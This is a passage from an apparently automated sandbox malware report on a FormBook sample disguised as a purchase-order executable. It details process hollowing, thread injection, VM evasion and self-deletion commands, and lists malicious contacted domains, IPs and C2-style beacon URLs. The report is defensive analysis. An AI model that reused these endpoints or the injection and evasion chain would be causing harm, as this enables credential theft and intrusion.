          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05111B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05111B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05134BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05134BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05134BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO98765.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 160.122.150.218 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PO98765.exeMemory written: C:\Users\user\Desktop\PO98765.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO98765.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO98765.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO98765.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO98765.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO98765.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO98765.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 1070000
          Source: C:\Users\user\Desktop\PO98765.exeProcess created: C:\Users\user\Desktop\PO98765.exe C:\Users\user\Desktop\PO98765.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO98765.exe'
          Source: explorer.exe, 00000002.00000000.682188809.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000000.682566937.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.923963210.0000000003990000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000000.696913420.0000000005E50000.00000004.00000001.sdmp, mstsc.exe, 00000003.00000002.923963210.0000000003990000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.682566937.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.923963210.0000000003990000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.682566937.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.923963210.0000000003990000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.700351269.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\PO98765.exeQueries volume information: C:\Users\user\Desktop\PO98765.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BA62D8 GetUserNameA,
          Source: C:\Users\user\Desktop\PO98765.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion14Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion14Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323082 Sample: PO98765.exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 31 www.punebites.com 2->31 33 www.edlasyarns.com 2->33 35 punebites.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 5 other signatures 2->49 11 PO98765.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\PO98765.exe.log, ASCII 11->29 dropped 59 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Injects a PE file into a foreign processes 11->63 15 PO98765.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 westhighlandwaytours.com 34.102.136.180, 49709, 80 GOOGLEUS United States 18->37 39 shops.myshopify.com 23.227.38.74, 49712, 80 CLOUDFLARENETUS Canada 18->39 41 4 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 mstsc.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO98765.exe14%VirustotalBrowse
          PO98765.exe10%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.PO98765.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.edlasyarns.com
          		160.122.150.218
          		truetrue
            		unknown
            punebites.com
            		81.19.215.15
            		truefalse
              		unknown
              westhighlandwaytours.com
              		34.102.136.180
              		truetrue
                		unknown
                shops.myshopify.com
                		23.227.38.74
                		truetrue
                  		unknown
                  www.bloochy.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.westhighlandwaytours.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.punebites.com
                      		unknown
                      		unknowntrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.comexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.tiro.comexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.%s.comPAexplorer.exe, 00000002.00000002.924230430.0000000002B50000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		low
                                          http://www.fonts.comexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              160.122.150.218
                                              		unknownSouth Africa
                                              		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                              34.102.136.180
                                              		unknownUnited States
                                              		15169GOOGLEUStrue
                                              23.227.38.74
                                              		unknownCanada
                                              		13335CLOUDFLARENETUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:323082
                                              Start date:26.11.2020
                                              Start time:09:55:26
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 56s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:PO98765.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:5
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/1@5/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 16.7% (good quality ratio 14.7%)
                                              • Quality average: 72%
                                              • Quality standard deviation: 32.3%
                                              HCA Information:
                                              • Successful, ratio: 95%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.42.151.234, 168.61.161.212, 52.147.198.201
                                              • Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, watson.telemetry.microsoft.com, skypedataprdcolwus16.cloudapp.net
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              09:56:26API Interceptor1x Sleep call for process: PO98765.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              34.102.136.180Booking Confirmation.xlsxGet hashmaliciousBrowse
                                              • www.setyourhead.com/kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll
                                              PI202009255687.xlsxGet hashmaliciousBrowse
                                              • www.lygosfilms.info/ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2
                                              VOMAXTRADING.docGet hashmaliciousBrowse
                                              • www.mycapecrusade.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA==
                                              purchase order.exeGet hashmaliciousBrowse
                                              • www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp
                                              inv.exeGet hashmaliciousBrowse
                                              • www.nextgenmemorabilia.com/hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4
                                              anthon.exeGet hashmaliciousBrowse
                                              • www.stlmache.com/94sb/?D8c=zlihirZ0hdZXaD&8pdPSNhX=oHhCnRhAqLFON9zTJDssyW7Qcc6qw5o0Z4654po5P9rAmpqiU8ijSaSHb7UixrcmwTy4
                                              RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                              • www.messianicentertainment.com/mkv/
                                              Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                              • www.youarecoveredamerica.com/cxs/?wR=30eviFukjpDMKdZAPLSN5kaysTzlcADcsOyOixR0/60FoTO0nFa3+4ZYvhmf8uIzSvTf&V4=inHXwbhx
                                              PO EME39134.xlsxGet hashmaliciousBrowse
                                              • www.pethgroup.com/mfg6/?NL08b=wzYKSVBwuJMkKFzZssaTzgW2Vk9zJFgyObnh9ous05GVmO8iDcl865kQdMMIGiQlXQz3Bg==&Ab=JpApTx
                                              PRODUCT INQUIRY BNQ1.xlsxGet hashmaliciousBrowse
                                              • www.d2cbox.com/coz3/?RFN4=Db4oM/0ZSLcS2WrsSk0EAPitYAH7G5kPXSBsu1Ti9XYpj/EUmwYzXG6I+6XEGkDvXHlCmg==&RB=NL00JzKhBv9HkNRp
                                              Document Required.xlsxGet hashmaliciousBrowse
                                              • www.vegbydesign.net/et2d/?LDHDp=V0L4Gg8XEG33noZ7KcimyECCbO7JKaiXnbIiZHmOm/4B4fbkqB2G6gSUl7eOq1VGLYG7cQ==&1bY8l=ktg8tf6PjX7
                                              Payment - Swift Copy.exeGet hashmaliciousBrowse
                                              • www.meetyourwish.com/mnc/?Mdkdxdax=WY4KUSY8ftRWBzX7AqE30jxuDiwNulyYTSspkj6O426HLT41/FrvTZzWmkvAdUuy3I6l&ZVj0=YN6tXn0HZ8X
                                              Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                              • www.kanmra.com/bg8v/?DXIXO=bN+sZwdqksHEVUXNrgv1qWKxxuRS+qOVBUFqNGSJvK31ERFsrbT8+Ywa/qntJ641tecm&Jt7=XPv4nH2h
                                              SR7UzD8vSg.exeGet hashmaliciousBrowse
                                              • www.seatoskyphotos.com/g65/?7nwhJ4l=TXJeSLolb01vansOrhIgOMhNYUnQdj/rfF4amJcBrUYE+yYYkSMe6xNPoYCNXAECPfCM&PpJ=2dGHUZtH1RcT9x
                                              fSBya4AvVj.exeGet hashmaliciousBrowse
                                              • www.crdtchef.com/coz3/?uVg8S=yVCTVPM0BpPlbRn&Cb=6KJmJcklo30WnY6vewxcXLig2KFmxMKN3/pat9BWRdDInxGr1qf1MmoT0+9/86rmVbJja+uPDg==
                                              7OKYiP6gHy.exeGet hashmaliciousBrowse
                                              • www.space-ghost.com/mz59/?DxlpdH=bx7WlvEZr3O5XBwInsT/p4C3h10gePk/QJkiFTbVYZMx/qNyufU701Fr8sAaS9DQf7SJ&k2Jxtb=fDHHbT_hY
                                              ptFIhqUe89.exeGet hashmaliciousBrowse
                                              • www.pethgroup.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSepgeCyUWcTuH
                                              G1K3UzwJBx.exeGet hashmaliciousBrowse
                                              • www.softdevteams.com/wsu/?JfBpEB4H=UDFlvLrb363Z/K3+q9OjWueixmKoOm8xQw3Yd3ofqrJMoI6bXqsuqW1H0uReyIz+CvJE&odqddr=RzuhPD
                                              ARRIVAL NOTICE.xlsxGet hashmaliciousBrowse
                                              • www.befitptstudio.com/ogg/?oN9xX=4mwbOnk+WEse1PEPUI+9OE7CuRKrYpR8Uy9t/eBM2SPWQ9N1Pm1uQBQ852Ah+FLlD8dO/Q==&r8=-ZoxsbmheH5H_0_
                                              Confectionary and choco.xlsxGet hashmaliciousBrowse
                                              • www.thesiromiel.com/kgw/?qDH4D=f8c0xBrPYPKd&ML30a=2i2TlC6nSGv7nfRnhje0HOiHksQfPDJcIBIB+Miyp4ApD+T5OEbWO8tIEn4OYJPJCmlhDQ==
                                              23.227.38.74inv.exeGet hashmaliciousBrowse
                                              • www.nairobi-paris.com/hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4
